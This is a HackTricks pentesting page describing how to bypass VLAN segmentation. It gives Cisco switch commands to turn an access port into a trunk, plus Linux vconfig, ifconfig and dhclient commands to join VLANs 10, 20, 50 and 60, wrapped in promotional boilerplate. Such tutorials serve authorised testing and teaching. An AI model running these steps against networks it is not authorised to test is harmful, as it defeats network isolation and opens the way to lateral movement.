hacktricks/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md

Lateral VLAN Segmentation Bypass

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.

This page was copied from https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9****

If you have access to a switch that you are directly connected to, you have the ability to bypass VLAN segmentation within the network. Simply switch the port to trunk mode (otherwise known as trunk), create virtual interfaces with the IDs of the target VLANs, and configure an IP address. You can try requesting the address dynamically (DHCP) or you can configure it statically. It depends on the case.

First you need to find out exactly which port you are connected to. This is done via CDP messages, or you can search the port by mask include.

If the CDP is suddenly disabled, you can try searching the port by our MAC address.

SW1(config)# show mac address-table | include 0050.0000.0500

Before we switch to trunk mode, we need to list the existing VLANs and find out their identifiers. Then we will hang these identifiers on our interface to access VLANs. Thus, thanks to the trunk we can access any VLAN. By the way, the port we are connected to belongs to VLAN 10.

SW1# show vlan brief

Here we go. Enter interface configuration mode and go into trunk mode.

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

During the switch to trunk mode, connectivity is lost. But I will fix that.

Create virtual interfaces and “hang” VLAN ID on them, and then raise them.

~$ sudo vconfig add eth0 10
~$ sudo vconfig add eth0 20
~$ sudo vconfig add eth0 50
~$ sudo vconfig add eth0 60
~$ sudo ifconfig eth0.10 up
~$ sudo ifconfig eth0.20 up
~$ sudo ifconfig eth0.50 up
~$ sudo ifconfig eth0.60 up

Now you need to request an address via DHCP. But if in your case this is not possible, you can set the address statically.

~$ sudo dhclient -v eth0.10
~$ sudo dhclient -v eth0.20
~$ sudo dhclient -v eth0.50
~$ sudo dhclient -v eth0.60

Example of configuring a static IP address on an interface (VLAN 10):

~$ sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0

To test the connection, I initiate ICMP requests to the default gateways for VLANs 10, 20, 50, 60

In the end, I bypassed VLAN segmentation and can get into any VLAN network, which unties my hands for the next steps

🎙️ HackTricks LIVE Twitch Wednesdays 5.30pm (UTC) 🎙️ - 🎥 Youtube 🎥

• Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
• Discover The PEASS Family, our collection of exclusive NFTs
• Get the official PEASS & HackTricks swag
• Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
• Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.